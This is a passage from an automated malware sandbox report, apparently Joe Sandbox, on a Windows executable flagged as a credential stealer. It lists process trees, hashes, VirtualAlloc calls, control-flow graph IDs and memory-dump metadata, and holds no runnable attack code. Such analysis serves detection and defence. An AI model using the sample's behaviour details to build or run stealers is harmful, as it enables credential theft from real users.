                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                        Imagebase:0x660000
                                                                                                                                                                        File size:1'845'760 bytes
                                                                                                                                                                        MD5 hash:1CF0D9BB6174853F764AABA59A7CD239
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1435855496.000000000138E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:5
                                                                                                                                                                        Start time:00:56:21
                                                                                                                                                                        Start date:24/11/2024
                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                        Imagebase:0x7ff6c4390000
                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:7
                                                                                                                                                                        Start time:00:56:23
                                                                                                                                                                        Start date:24/11/2024
                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1880,i,4249164096274677999,9181346475388211576,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                        Imagebase:0x7ff6c4390000
                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:8
                                                                                                                                                                        Start time:00:56:24
                                                                                                                                                                        Start date:24/11/2024
                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                        Imagebase:0x7ff6c4390000
                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:9
                                                                                                                                                                        Start time:00:56:25
                                                                                                                                                                        Start date:24/11/2024
                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1916,i,2138066403308314358,10443051361612717293,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                        Imagebase:0x7ff6c4390000
                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Reset < >

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:0.2%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:5
                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                          execution_graph 2036 658eb0b VirtualAlloc 2037 658eb29 2036->2037 2038 658e475 2039 658e9b7 VirtualAlloc 2038->2039 2041 658ef10 2039->2041

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 658eb0b-658eb24 VirtualAlloc 1 658eb29-658f759 0->1
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000), ref: 0658EB0D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1727821407.000000000658A000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1727764497.0000000006580000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727782291.0000000006582000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727802292.0000000006586000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.000000000670A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006813000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006822000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006824000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6580000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                          • Opcode ID: a2dd0a5ce6a2c612c2da440d41e344615e3475d60ebbe0e3731a51366bda5320
                                                                                                                                                                          • Instruction ID: 9efc962849a594c252380561f1825f143ba3bbb386c1e60c59f83baeba4478e0
                                                                                                                                                                          • Opcode Fuzzy Hash: a2dd0a5ce6a2c612c2da440d41e344615e3475d60ebbe0e3731a51366bda5320
                                                                                                                                                                          • Instruction Fuzzy Hash: 5C115C7240C3149FE3803E68EC896FE7AE4EF09660F154E2AA651E3E00D1654800C2D6

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 8 658e475-658ef04 VirtualAlloc 15 658ef10-658f297 8->15
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000), ref: 0658EEFE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1727821407.000000000658A000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1727764497.0000000006580000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727782291.0000000006582000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727802292.0000000006586000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.000000000670A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006813000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006822000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006824000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6580000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                          • Opcode ID: aea93e07ce3b0554554877026480e4b925d2b6fbfece6ddd13a319aa13d82a33
                                                                                                                                                                          • Instruction ID: 3529ba02f219d38ab9bd5896185c41627942aa81a4d52a37d1a9ff676ae5b422
                                                                                                                                                                          • Opcode Fuzzy Hash: aea93e07ce3b0554554877026480e4b925d2b6fbfece6ddd13a319aa13d82a33
                                                                                                                                                                          • Instruction Fuzzy Hash: E6016DB2508644DFE7407F08DC0666A7BB4FB98710F154A28EAD1A7A40E635AC64CAC3

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 30 65bbafb-65bbd47 31 65bbd4d-65bbd61 30->31 32 65bbd63-65bc2d8 30->32 31->32
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1727821407.000000000658A000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1727764497.0000000006580000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727782291.0000000006582000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727802292.0000000006586000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.000000000670A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006813000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006822000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006824000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6580000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: @s?$P~-
                                                                                                                                                                          • API String ID: 0-2406764712
                                                                                                                                                                          • Opcode ID: b6d64a4811e253bc4c9b1a8cdabf7b7348a880874995b4e934f3f825d0de62c0
                                                                                                                                                                          • Instruction ID: 70d3c9eac8297a8283874b6b919119638837f35dd8a419a78079118ee19b179b
                                                                                                                                                                          • Opcode Fuzzy Hash: b6d64a4811e253bc4c9b1a8cdabf7b7348a880874995b4e934f3f825d0de62c0
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A02CDB3F152108BF3444E38DC953A6B692EB90324F2F863C8E98977C5D97E5C468781

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 33 65bafc2-65bb1b3 34 65bb1b9-65bb1be 33->34 35 65bb1c3-65bb750 33->35 34->35
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1727821407.000000000658A000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1727764497.0000000006580000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727782291.0000000006582000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727802292.0000000006586000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.000000000670A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006813000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006822000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006824000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6580000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: vX=k$jnw
                                                                                                                                                                          • API String ID: 0-1411130770
                                                                                                                                                                          • Opcode ID: 75216e659f7d39af34bbbbda55b6c8a415d7b77fa7d59b894048fa089de04067
                                                                                                                                                                          • Instruction ID: b8e397f2211b608ef0dc9379c946da7f45abe81a2b959adc55e332a2e456971e
                                                                                                                                                                          • Opcode Fuzzy Hash: 75216e659f7d39af34bbbbda55b6c8a415d7b77fa7d59b894048fa089de04067
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D02F0F3F152104BF3144D39DD983A6B6C3DBD5324F2A823D9B889BBC9D87D980A4285

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 36 65a1ac8-65a1cdb 37 65a1cec-65a2261 36->37 38 65a1ce1-65a1ce6 36->38 38->37
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1727821407.000000000658A000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1727764497.0000000006580000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727782291.0000000006582000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727802292.0000000006586000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.000000000670A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006813000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006822000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006824000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6580000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: %;c[$u<>
                                                                                                                                                                          • API String ID: 0-540723954
                                                                                                                                                                          • Opcode ID: db67f850a8adce9b46f119062be60fa22c33bc9c9a7cea2c985aa955c873b6ca
                                                                                                                                                                          • Instruction ID: 892d07f81f12e5e6a59e9995b2f983ac6ff7d366f0285e26e52df800084debff
                                                                                                                                                                          • Opcode Fuzzy Hash: db67f850a8adce9b46f119062be60fa22c33bc9c9a7cea2c985aa955c873b6ca
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D02E1F3F112144BF3485A38DC58366B693EBD5320F2B823C9B999B7C4E93E5D064685

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 60 65d740b-65d77e1 61 65d77fe-65d7bf2 60->61 62 65d77e7-65d77f9 60->62 62->61
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1727821407.000000000658A000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1727764497.0000000006580000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727782291.0000000006582000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727802292.0000000006586000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.000000000670A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006813000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006822000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006824000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6580000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: S35z
                                                                                                                                                                          • API String ID: 0-3425730061
                                                                                                                                                                          • Opcode ID: c06b1098e592719fb4f592950d859ec4a6c769b67afdc5c5e1f276df0681bba0
                                                                                                                                                                          • Instruction ID: 3016dbececda74d8489ab552848ba815f5920ae9b91aa1f66fc058b05f4d69f1
                                                                                                                                                                          • Opcode Fuzzy Hash: c06b1098e592719fb4f592950d859ec4a6c769b67afdc5c5e1f276df0681bba0
                                                                                                                                                                          • Instruction Fuzzy Hash: 0702E0B3F152204BF3485A38CC95366B692EB94320F2B423C9B9D977C5DD7E5C058385

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 63 6597a63-6597c03 64 6597c09-6597c0b 63->64 65 6597c11-6597d32 63->65 64->65 66 6597d38-6597d48 65->66 67 6597d4e-6598124 65->67 66->67
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1727821407.000000000658A000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1727764497.0000000006580000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727782291.0000000006582000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727802292.0000000006586000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.000000000670A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006813000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006822000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006824000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6580000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: '}
                                                                                                                                                                          • API String ID: 0-1601387242
                                                                                                                                                                          • Opcode ID: 505cf3358d47954389b3904469dc1807731c91491473728bc24b995a64bf5724
                                                                                                                                                                          • Instruction ID: 9edb77534e3bff2c30bd9fdd3e36d5be23d6218f1e8abbcd0f0da9975b94b999
                                                                                                                                                                          • Opcode Fuzzy Hash: 505cf3358d47954389b3904469dc1807731c91491473728bc24b995a64bf5724
                                                                                                                                                                          • Instruction Fuzzy Hash: 0DF1EFB3E142244BF3544E29CC583A6B692EB95320F2F863CDE88A77C4D97E5D0987C5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000003.1516976292.0000000001349000.00000004.00000020.00020000.00000000.sdmp, Offset: 01349000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_3_1349000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: da6b657925d42a6d93f4db7bc84798019791a643260ef1a98a8970aa276b7c2f
                                                                                                                                                                          • Instruction ID: 986a100c968b25232700d2a90930abc4609384cf804ee02025cc0d3f6d8dd5c3
                                                                                                                                                                          • Opcode Fuzzy Hash: da6b657925d42a6d93f4db7bc84798019791a643260ef1a98a8970aa276b7c2f
                                                                                                                                                                          • Instruction Fuzzy Hash: 0B51181117E7C21EE64B773308565C12FA349A75C0BCEA2EFD4C09AEAB900F455F9672

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 68 65c134a-65c1476 69 65c147c-65c1495 68->69 70 65c1497-65c1717 68->70 69->70 71 65c171d-65c1725 70->71 72 65c172b-65c172e 70->72 71->72 73 65c1734-65c174c 72->73 74 65c1751 72->74 75 65c1752-65c18a7 73->75 74->75
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1727821407.000000000658A000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1727764497.0000000006580000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727782291.0000000006582000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727802292.0000000006586000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.000000000670A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006813000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006822000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006824000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6580000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: L
                                                                                                                                                                          • API String ID: 0-2909332022
                                                                                                                                                                          • Opcode ID: cc497d71a5c15a1dab373aa1b44a2fc9d4467266a80615fcfe071fcb3e6253c9
                                                                                                                                                                          • Instruction ID: e418e87d0fdb1a06e52cafa5be3ddabd8eff3152b6cfbf111511013226ecfa39
                                                                                                                                                                          • Opcode Fuzzy Hash: cc497d71a5c15a1dab373aa1b44a2fc9d4467266a80615fcfe071fcb3e6253c9
                                                                                                                                                                          • Instruction Fuzzy Hash: 93B16CB3F116254BF3544878CC583A26683DBE1325F2F82388F596BBCAE87E5D465384

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 76 65a3f4a-65a413e 77 65a4150-65a42a6 76->77 78 65a4144-65a414a 76->78 79 65a42c9 77->79 80 65a42ac-65a42c4 77->80 78->77 81 65a42ca-65a4451 79->81 80->81
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1727821407.000000000658A000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1727764497.0000000006580000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727782291.0000000006582000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727802292.0000000006586000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.000000000670A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006813000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006822000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006824000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6580000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: F~a,
                                                                                                                                                                          • API String ID: 0-2406132642
                                                                                                                                                                          • Opcode ID: c88ab674c76075e89388c6735b3d920851969ad6b2a2c054b78435fc12199d4d
                                                                                                                                                                          • Instruction ID: 43ae13d7b1946ab490b713d7630d801d1f5e529db1209ce69db21e1e8b659857
                                                                                                                                                                          • Opcode Fuzzy Hash: c88ab674c76075e89388c6735b3d920851969ad6b2a2c054b78435fc12199d4d
                                                                                                                                                                          • Instruction Fuzzy Hash: 55B17CB3F116254BF3444968CC583A26683D7D5320F2F82788F5CABBC9D8BE9D4A5384

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 82 65c9a3d-65c9b3e 83 65c9b4e-65c9f21 82->83 84 65c9b44-65c9b4c 82->84 84->83
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1727821407.000000000658A000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1727764497.0000000006580000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727782291.0000000006582000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727802292.0000000006586000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.000000000670A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006813000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006822000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006824000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6580000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: q
                                                                                                                                                                          • API String ID: 0-4110462503
                                                                                                                                                                          • Opcode ID: 884059f2dbc5d92c3582eae4669d9ab61b60fca0daca71a42a405ac5d6080b38
                                                                                                                                                                          • Instruction ID: e91292df6a15ff9db65f61f53267eb545d29a31d9e90692f47ae3f5c8edb6078
                                                                                                                                                                          • Opcode Fuzzy Hash: 884059f2dbc5d92c3582eae4669d9ab61b60fca0daca71a42a405ac5d6080b38
                                                                                                                                                                          • Instruction Fuzzy Hash: C0B1AEB3F1122507F3544839CD983626683DBD5320F2F82788E5CABBC9DDBE5D4A1284

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 85 65d52da-65d552a 86 65d553d-65d560f 85->86 87 65d5530-65d5537 85->87 88 65d5615-65d563b 86->88 89 65d5646-65d564f 86->89 87->86 88->89 90 65d5655-65d5727 88->90 89->90
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1727821407.000000000658A000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1727764497.0000000006580000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727782291.0000000006582000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727802292.0000000006586000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.000000000670A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006813000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006822000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1727821407.0000000006824000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6580000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
